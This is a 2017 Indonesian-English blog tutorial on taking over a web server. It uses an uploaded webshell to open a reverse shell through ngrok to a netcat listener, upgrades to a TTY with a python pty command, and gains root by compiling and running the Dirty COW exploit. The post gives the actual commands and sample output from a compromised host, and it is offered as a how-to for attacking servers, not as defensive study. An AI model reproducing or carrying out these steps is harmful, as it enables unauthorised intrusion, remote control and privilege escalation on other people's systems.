Minggu, 03 September 2017


Lets start ...
Pahami Tutorial Dengan Benar , Jika Kurang Fokus Ini Akan Menjadi Hal Yang Sangat Rumit , Saya Melihat Tutorial Di Lulzsecindia , Saya Hanya Mempulikasi Ulang .

For that few things are required 
  1. Ngrok
  2. Netcat       
  3. webshell on server
  4. Root exploit   
We can use any shell , if you dont have one download it from Github ,
I suggest you to download WSO shell https://github.com/wso-shell/WSO/blob/master/WSO.php
if you want our private shell
the link will provided soon here (  *  )

Step 1 : First thing first make sure your ngrok is running  (else you will be end up with "mera connect nahi ho raha  " ) 
Note : In some case server wont connect because sever may have restrict back connect or script which perform back connect get deleted from server (happen in very rare case for that we have another solution) 

Step 2 : Make sure Netcat is listening on port , in my case i am using ( 1337 )
Command for Netcat :   nc -lnvp 1337  




ok this is grate 

Ngrok has provided us a (dns , ip or url ) and port in my case this is

ip : 0.tcp.ngrok.io 
port : 15288
and Netcat is listening on 1337 
Open web shell i am using IndoXploit shell
go to network
see below 


Then type your Ngrok ip and port like this .


now press the Reverse 
After that see your netcat CMD  it will be showing like this :


Now we need TTY shell you can use from this link https://netsec.ws/?p=337 
or just copy this and paste : python -c 'import pty; pty.spawn("/bin/sh")'


After that you need to search the root exploit for this server . 
as you can see i have done id and uname -a 
it will show me id which is currently apache

id : [ uid=48(apache) gid=48(apache) groups=48(apache) ]
uname -a  :  Linux xxxxxxxx.pk 2.6.32-642.el6.x86_64 #1 SMP Tue May 10 17:27:01 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

see below image


Now we need to download root exploit which will give us root privilege of this server
in this tutorial i am using dirty cow it can be used for any server till september 2016 .

link is here  Raw.githubusercontent


download and upload it into the server like i have did in my case it is  po.c
*USE UPLOAD FUNCTION WHICH IS PRESENT IN SHELL TO UPLOAD .C FILE* 

command : ls *.c
now we have to compile the po.c File 

using this command :  

gcc -pthread po.c -o panda -lcrypt
now we get the compiled file of that po.c in panda


next we have to permission to it
command : chmod +x panda

now we need to execute the compiled file 

just simply pressing 

./panda 

([dot][slash]panda)

after that it will ask for password put the password

ok now press ctr + c close the netcat CMD
then re connect to the server 


then type 
su panda
then it will ask for password put your password again ????????
see what happen next in below image 


now just type id command 
id :  uid=0(panda) gid=0(root) groups=0(root)

If somewhat confusing, please comment below, then we will reply as soon as possible, if you like our article article please subs cribe.

Video Tutorial Agar Lebih Mudah Dipelajari , mungkin Tutorial Teks dan Video Agak Sedikit Berbeda Langsung Saja Liat Video Nya Disini 

  • Step 1 :

  • Step 2

                                      

Suka Dengan Konten Kami ? Say hello ....


EmoticonEmoticon